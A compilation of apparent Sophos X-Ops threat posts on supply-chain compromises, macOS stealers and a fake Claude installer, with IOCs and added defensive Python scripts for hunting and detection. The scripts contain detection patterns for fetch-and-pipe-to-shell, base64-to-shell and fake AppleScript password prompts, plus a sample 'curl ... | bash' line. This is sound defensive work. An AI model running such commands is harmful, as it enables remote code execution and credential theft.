We handed OpenClaw a penetration testing toolkit and pointed it at one of our own legacy Active Directory networks.
The result: 23 findings across 11 attack paths…
Full breakdown 👇
https://www.youtube.com/watch?v=NEculTwSj80

New from Sophos X-Ops: the Nx Console VS Code extension compromise that led to the GitHub breach drops a Python backdoor that uses the GitHub Search API itself as its C2 channel — polling commit messages hourly for RSA-signed commands hidden in plain sight.
Analysis, IOCs, recommendations and protections: https://www.sophos.com/en-us/blog/github-internal-repositories-breached
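The post describes a C2 channel that hides in legitimate-looking traffic: the backdoor queries the GitHub Search API for commit messages once an hour. One way to surface that from egress logs is to look not at the destination (developers hit that API all day) but at the cadence. The script below is an added example, not Sophos code and not taken from the linked analysis; its log format, client addresses and the hourly period with a 5% jitter tolerance are all constructed assumptions.

```python
"""Flag hosts polling the GitHub Search API on a fixed cadence.

Added example (not Sophos code). Legitimate developer use of the Search API
is bursty; a client hitting the same search endpoint every ~3600 s with
almost no jitter is worth tracing back to the process behind it.
Log format below is constructed for the example.
"""
from collections import defaultdict
from datetime import datetime, timezone
from statistics import median
from urllib.parse import urlsplit

# Constructed sample proxy log: "<iso8601> <client_ip> <method> <url>"
SAMPLE_LOG = """\
2026-04-01T08:00:03Z 10.1.1.20 GET https://api.github.com/search/commits?q=repo%3Aexample%2Fnotes
2026-04-01T08:14:51Z 10.1.1.44 GET https://api.github.com/search/commits?q=fix+login
2026-04-01T09:00:01Z 10.1.1.20 GET https://api.github.com/search/commits?q=repo%3Aexample%2Fnotes
2026-04-01T09:15:09Z 10.1.1.44 GET https://api.github.com/search/code?q=TODO
2026-04-01T10:00:05Z 10.1.1.20 GET https://api.github.com/search/commits?q=repo%3Aexample%2Fnotes
2026-04-01T10:00:09Z 10.1.1.44 GET https://api.github.com/repos/example/app/pulls
2026-04-01T11:00:00Z 10.1.1.20 GET https://api.github.com/search/commits?q=repo%3Aexample%2Fnotes
2026-04-01T12:00:02Z 10.1.1.20 GET https://api.github.com/search/commits?q=repo%3Aexample%2Fnotes
2026-04-01T12:30:00Z 10.1.1.44 GET https://api.github.com/search/commits?q=fix+login
"""

SEARCH_HOST = "api.github.com"
SEARCH_PATH_PREFIX = "/search/"


def parse_log(text):
    """Yield (timestamp, client, path) for requests to the GitHub Search API."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url = line.split(" ", 3)
        parts = urlsplit(url)
        if parts.hostname == SEARCH_HOST and parts.path.startswith(SEARCH_PATH_PREFIX):
            when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
            yield when, client, parts.path


def find_periodic_pollers(text, expected_period=3600, tolerance=0.05, min_requests=4):
    """Return {(client, path): median_interval_seconds} for clients whose
    Search API requests recur at expected_period (+/- tolerance) at least
    min_requests times. Jitter is the largest deviation of any interval from
    the median, so a single burst of manual searches breaks the pattern."""
    buckets = defaultdict(list)
    for when, client, path in parse_log(text):
        buckets[(client, path)].append(when)

    hits = {}
    allowed = tolerance * expected_period
    for key, times in buckets.items():
        if len(times) < min_requests:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = median(gaps)
        worst = max(abs(g - med) for g in gaps)
        if abs(med - expected_period) <= allowed and worst <= allowed:
            hits[key] = med
    return hits


if __name__ == "__main__":
    for (client, path), period in find_periodic_pollers(SAMPLE_LOG).items():
        print(f"{client} polls {path} every ~{period:.0f}s - identify the process behind it")
```

In the constructed log only 10.1.1.20 is flagged: its five requests to /search/commits are an hour apart to within a few seconds, while 10.1.1.44 searches irregularly and falls under the request threshold. Tune the period if the implant's interval differs from the hourly one the post describes.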
Our CTU Research team has been tracking GOLD SALEM (aka Warlock), a ransomware group that has torn through 60+ organisations across 3 continents in 6 months!
New video out now ⬇️

Mainstream malware now regularly affects macOS users, particularly infostealers, which account for a significant portion of all the macOS detections we see in telemetry.
Tracked since at least 2023, AMOS (Atomic macOS Stealer) is particularly prolific. It accounted for almost 40% of our macOS protection updates last year (more than double any other macOS malware family) and almost 50% of recent macOS stealer reports.
Like the MacSync stealer we reported on recently, malvertising and ClickFix-style techniques are often the initial infection vector for AMOS. Many recent lures are related to AI tools, taking advantage of the increased demand for, and popularity of, these technologies.
Our Managed Detection and Response (MDR) team has produced a detailed overview of the AMOS attack chain, along with detection and prevention opportunities: https://www.sophos.com/en-us/blog/why-amos-matters-the-macos-malware-stealing-data-at-scale
🚨 Two supply chain attacks, same day, same C2. Sophos X-Ops is aware of reports of attackers hijacking Checkmarx KICS (Docker Hub, Open VSX, GitHub Actions) and the Bitwarden CLI (npm) to steal developer credentials on April 22. Evidence suggests one coordinated campaign. 🧵
Checkmarx KICS: tampered Docker images (5M+ pulls), backdoored VS Code extensions with a commit spoofed to look like it shipped in 2022, and a malicious GitHub Action release. Payload (mcpAddon.js) swept GitHub/npm tokens, cloud creds, SSH keys, Claude/MCP configs
Bitwarden CLI: @bitwarden/cli v2026.4.0 distributed for a 93-min window (17:57–19:30 ET). Preinstall hook pulled Bun + payload targeting developer creds, tokens, Cursor and Aider configs. 70K+ weekly downloads. Vault data reportedly not affected.
Novel twist on the Bitwarden side: stolen GitHub tokens were weaponized in-line to inject malicious workflows into victim repos, and the payload created public repos in victim accounts to store AES-encrypted data
Shared C2: both campaigns exfil to audit.checkmarx[.]cx (94.154.172[.]43).
This follows an incident last month where TeamPCP compromised Checkmarx GitHub Actions alongside Trivy, LiteLLM, and Telnyx in a broader supply chain attack campaign
If you pulled any affected versions: ▪️ Remove them now ▪️ Rotate GitHub/npm/cloud/SSH creds ▪️ Audit for injected workflows + new public repos in your org ▪️ Rotate secrets in any Claude/Cursor/Aider configs on affected hosts
Sophos coverage: ▪️ JS/Steal-EAP ▪️ Linux/Agnt-HZ ▪️ 94.154.172[.]43 and checkmarx[.]cx blocked
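The thread's first remediation step is to find affected versions on developer machines and build agents. The script below is an added example, not Sophos code: it walks a Node.js install tree, flags the package/version pair named in the thread (@bitwarden/cli 2026.4.0) and lists every package that declares an npm lifecycle script, since a preinstall hook is how this payload ran. The sample package.json files, including the preinstall command shown for the constructed Bitwarden entry, are fabricated for the example; a hook hit means "review", not "malicious".

```python
"""Audit a Node.js install tree for known-bad package versions and for
lifecycle scripts that npm runs automatically at install time.

Added example (not Sophos code). KNOWN_BAD holds the version named in the
thread; the sample tree below is constructed.
"""
import json
import tempfile
from pathlib import Path

# Package/version pairs named in the thread. Extend with your own intel.
KNOWN_BAD = {("@bitwarden/cli", "2026.4.0")}
# npm executes these without asking during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def audit_package_json(path, data):
    """Return [(kind, detail, path)] findings for one parsed package.json."""
    findings = []
    name, version = data.get("name"), data.get("version")
    if (name, version) in KNOWN_BAD:
        findings.append(("known-bad-version", f"{name}@{version}", str(path)))
    scripts = data.get("scripts") or {}
    if not isinstance(scripts, dict):
        scripts = {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if cmd:
            findings.append(("lifecycle-hook", f"{name}@{version} {hook}: {cmd}", str(path)))
    return findings


def audit_tree(root):
    """Audit every package.json under root (node_modules, global prefix, caches)."""
    findings = []
    for path in Path(root).rglob("package.json"):
        try:
            data = json.loads(path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or not JSON: skip rather than abort the sweep
        if isinstance(data, dict):
            findings.extend(audit_package_json(path, data))
    return findings


# --- constructed sample tree (no real package contents) ---------------------
SAMPLE_TREE = {
    "node_modules/@bitwarden/cli/package.json": {
        "name": "@bitwarden/cli", "version": "2026.4.0",
        # constructed hook; the real payload command is not reproduced here
        "scripts": {"preinstall": "node -e \"require('./setup.js')\""},
    },
    "node_modules/left-pad/package.json": {"name": "left-pad", "version": "1.3.0"},
    "node_modules/esbuild/package.json": {
        "name": "esbuild", "version": "0.21.0",
        "scripts": {"postinstall": "node install.js"},  # benign hook, still listed
    },
}


def build_sample(root):
    """Materialise SAMPLE_TREE under root."""
    for rel, data in SAMPLE_TREE.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(json.dumps(data), encoding="utf-8")


def demo():
    """Build the constructed tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        return audit_tree(tmp)


if __name__ == "__main__":
    for kind, detail, where in demo():
        print(f"[{kind}] {detail}  ({where})")
```

Run `audit_tree()` against a project's node_modules, the npm global prefix (`npm prefix -g`) and `~/.npm/_npx` to cover one-off `npx` installs. Expect benign hooks (native build steps such as esbuild's) in the output; the point is to review each one on hosts that installed during the window the thread gives.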
Sophos X-Ops recently investigated a report of a fake Claude website distributing malware. The malicious domain (claude-pro[.]com) serves a file named Claude-Pro-windows-x64.zip, which when extracted results in an MSI installer file (Claude.msi).
At the end of the attack chain is a sideloaded DLL, resulting in a PlugX infection. PlugX is a well-known modular RAT, with multiple variants and a penchant for sideloading (see https://www.sophos.com/en-us/blog/border-hopping-plugx-usb-worm).
Based on a similar sample (https://www.virustotal.com/gui/file/e6d66d192a779f195426db94d2568c03a9bd0d2e8f1972aa32a0317940ae19c2), this campaign may have been ongoing since February 2026.
Most interestingly, as we noted in a recent post on macOS infostealers (https://www.sophos.com/en-us/blog/evil-evolution-clickfix-and-macos-infostealers), threat actors are clearly adapting to the widespread interest in popular AI tools, crafting lures that imitate legitimate AI sites (often through malvertising campaigns).
What to do: Only download Claude from the legitimate site (claude.com). Be wary of following links from ads and sponsored search results. Check your system for the files mentioned above. Sophos protection: Troj/PlugxLdr-A.
More info: https://www.virustotal.com/gui/domain/claude-pro.com
Claude-Pro-windows-x64.zip (SHA1: 3de213252d98348a7d833c4956a099bfcd36b9e2)
Claude.msi (SHA1: f02a97a42b303c068ac23859599d5610bcbb4550)
Avk.dll (SHA1: 910465739b3170584150e9260bfba6a65e633f35)

Update: We've done some further digging into this, and found that the C2 server is licence[.]claude-pro[.]com (port 443 over TCP, 8080 over UDP), with the following apparent ‘beacon’ structure: {"agent_id":"agent-[id]","hostname":"","user":"","heartbeat":3}.
Interestingly, while the attack chain is very similar to PlugX, the decrypted first-stage payload appears to be a variant of DonutLoader, an in-memory loader used by a variety of threat actors. (See our Crimson Palace coverage for a notable example: https://www.sophos.com/en-us/blog/crimson-palace-new-tools-tactics-targets)
Sophos protections: ATK/DonutLdr-B, Troj/Loader-OT. As for the final stage payload, it contains an interesting string: “beagle_default_secret_key_12345!”. We’re currently investigating that payload further and will report back with any findings.
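The fake-Claude posts give three kinds of indicator: file hashes, a C2 domain, and the shape of the beacon. The script below is an added example, not Sophos code, that turns them into a hunt: a SHA1 sweep of a directory tree, a domain match that also catches subdomains such as licence.claude-pro.com, and a structural check on request bodies that matches the beacon's exact key set and "agent-" prefix even if the operator moves to a new domain. The hashes and domain are those quoted above; the sample files and log lines are constructed, so the real archive is never needed.

```python
"""Hunt for the indicators in the fake-Claude / PlugX posts above.

Added example, not Sophos code. SHA1 values and the C2 domain are quoted
from the posts; the beacon check follows the field structure in the update.
Every file and log line processed here is constructed for the example.
"""
import hashlib
import json
import tempfile
from pathlib import Path

# File indicators quoted in the post: SHA1 -> file name.
SHA1_IOCS = {
    "3de213252d98348a7d833c4956a099bfcd36b9e2": "Claude-Pro-windows-x64.zip",
    "f02a97a42b303c068ac23859599d5610bcbb4550": "Claude.msi",
    "910465739b3170584150e9260bfba6a65e633f35": "Avk.dll",
}
# Network indicator quoted in the post; matched as the domain or any subdomain.
C2_DOMAINS = {"claude-pro.com"}
# Keys of the beacon in the update: {"agent_id":"agent-[id]","hostname":"","user":"","heartbeat":3}
BEACON_KEYS = {"agent_id", "hostname", "user", "heartbeat"}


def sha1_of(path):
    """SHA1 of a file, streamed so large installers are not read into memory."""
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep_files(root, iocs=SHA1_IOCS):
    """Return [(path, indicator_name)] for files under root whose SHA1 is in iocs."""
    hits = []
    for p in Path(root).rglob("*"):
        if p.is_file():
            digest = sha1_of(p)
            if digest in iocs:
                hits.append((str(p), iocs[digest]))
    return hits


def domain_matches(host):
    """True for the C2 domain itself or any label beneath it."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in C2_DOMAINS)


def looks_like_beacon(payload):
    """True if payload is a JSON object with exactly the beacon's keys, an
    'agent-' prefixed agent_id and an integer heartbeat."""
    try:
        obj = json.loads(payload)
    except ValueError:
        return False
    return (isinstance(obj, dict) and set(obj) == BEACON_KEYS
            and isinstance(obj["agent_id"], str) and obj["agent_id"].startswith("agent-")
            and isinstance(obj["heartbeat"], int) and not isinstance(obj["heartbeat"], bool))


def sweep_log(lines):
    """Classify constructed '<host> <request body>' lines by indicator type."""
    hits = []
    for line in lines:
        host, _, payload = line.partition(" ")
        if domain_matches(host):
            hits.append(("c2-domain", line))
        elif looks_like_beacon(payload):
            hits.append(("beacon-shape", line))
    return hits


# Constructed sample: a beacon to the known domain, a benign request, a beacon to an unknown host.
SAMPLE_LOG = [
    'licence.claude-pro.com {"agent_id":"agent-7f3a","hostname":"WS-01","user":"alice","heartbeat":3}',
    'updates.example.org {"status":"ok"}',
    '203.0.113.9 {"agent_id":"agent-1b2c","hostname":"WS-02","user":"bob","heartbeat":3}',
]


def demo_file_sweep():
    """Write a constructed file, register its own SHA1 as an extra indicator,
    and confirm the walker finds it. Returns the hit count (expected 1)."""
    with tempfile.TemporaryDirectory() as tmp:
        sample = Path(tmp, "Downloads", "Claude-Pro-windows-x64.zip")
        sample.parent.mkdir()
        sample.write_bytes(b"constructed sample, not the real archive")
        iocs = dict(SHA1_IOCS, **{sha1_of(sample): "constructed-sample"})
        return len(sweep_files(tmp, iocs))


if __name__ == "__main__":
    print("file hits:", demo_file_sweep())
    for reason, line in sweep_log(SAMPLE_LOG):
        print(reason, "->", line)
```

Point `sweep_files()` at the Downloads folder and the MSI cache, and feed `sweep_log()` the host plus decrypted request body from your proxy or EDR network telemetry. The third sample line shows why the shape check matters: the beacon to 203.0.113.9 would pass a domain-only blocklist.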
For example: in Dec 2025, we observed a ClickFix campaign that leveraged shared ChatGPT conversations containing malicious links, leading to MacSync infections.
A more recent campaign, in February, featured an updated MacSync variant – a multistage loader-as-a-service model, using shell-based loaders, API key-gated C2 infrastructure, dynamic AppleScript payloads, and aggressive in-memory execution.
Shell-based implementations provide threat actors with greater effectiveness and evasive capabilities, compared to native Mach-O binaries.
This latest variant also has the ability to patch Ledger Live with malicious logic – which could lead to crypto wallets being drained of funds.
It’s important to take into account the wider context of the increased risk to macOS users. Mainstream malware now regularly affects macOS users – particularly infostealers, which account for a significant portion of the macOS detections we see in telemetry.
We expect this region of the threat landscape to keep evolving, and rapidly. Read the full article here: https://www.sophos.com/en-us/blog/evil-evolution-clickfix-and-macos-infostealers
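The MacSync thread describes loaders that live in shell commands and inline AppleScript rather than in a Mach-O binary, which is exactly what file-hash detection misses. The script below is an added example, not Sophos detection logic: it applies a few behavioural heuristics to process-execution events, constructed here as (parent process, command line) pairs in the form an EDR or Endpoint Security client would report. The patterns (fetch-and-pipe into a shell, inline base64 decoded into a shell, osascript given an inline script, an AppleScript dialog with a hidden answer) are generic ClickFix and shell-loader tells chosen for the example, not rules taken from the article.

```python
"""Flag shell-based loader behaviour of the kind described for MacSync.

Added example, not Sophos detection logic. Heuristics run over constructed
(parent, command line) process events; the rules are assumptions that cover
common ClickFix / shell-loader tells on macOS.
"""
import re

RULES = [
    # curl/wget output piped straight into sh/bash/zsh, optionally via sudo
    ("fetch-pipe-shell", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|)sh\b")),
    # base64 decoded on the command line and piped into a shell (-D is the macOS spelling)
    ("base64-to-shell", re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(ba|z|)sh\b")),
    # AppleScript supplied inline rather than from a script file
    ("inline-applescript", re.compile(r"\bosascript\s+-e\s+")),
    # an AppleScript dialog that masks input: the classic fake password prompt
    ("applescript-password-prompt", re.compile(r"display dialog\b.*\bhidden answer\b")),
]

# Parents from which a user paste (the ClickFix delivery path) would launch.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2"}


def classify(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(events):
    """Return [(parent, cmdline, rules, pasted)] for events matching at least
    one rule. 'pasted' marks launches from an interactive terminal so they
    can be triaged first."""
    findings = []
    for parent, cmdline in events:
        rules = classify(cmdline)
        if rules:
            findings.append((parent, cmdline, rules, parent in INTERACTIVE_PARENTS))
    return findings


# Constructed sample events; example.invalid never resolves.
SAMPLE_EVENTS = [
    ("Terminal", "curl -fsSL https://example.invalid/setup.sh | bash"),
    ("Terminal", "echo aW5zdGFsbA== | base64 -D | sh"),
    ("Terminal", "osascript -e 'display dialog \"Update required\" default answer \"\" with hidden answer'"),
    ("brew", "curl -fsSL https://example.invalid/formula.rb -o /tmp/formula.rb"),
    ("launchd", "osascript /Users/alice/Library/Scripts/backup.scpt"),
    ("zsh", "ls -la"),
]

if __name__ == "__main__":
    for parent, cmdline, rules, pasted in scan(SAMPLE_EVENTS):
        flag = " [interactive paste]" if pasted else ""
        print(f"{parent}: {', '.join(rules)}{flag}\n    {cmdline}")
```

The two benign events (a curl that writes to disk without a pipe, and osascript run against a file by launchd) are not flagged, which is the point of matching on the pipe-to-shell and inline-script shape rather than on the tool names. In-memory execution stages leave little on disk, so process command lines and parent relationships are the telemetry that remains.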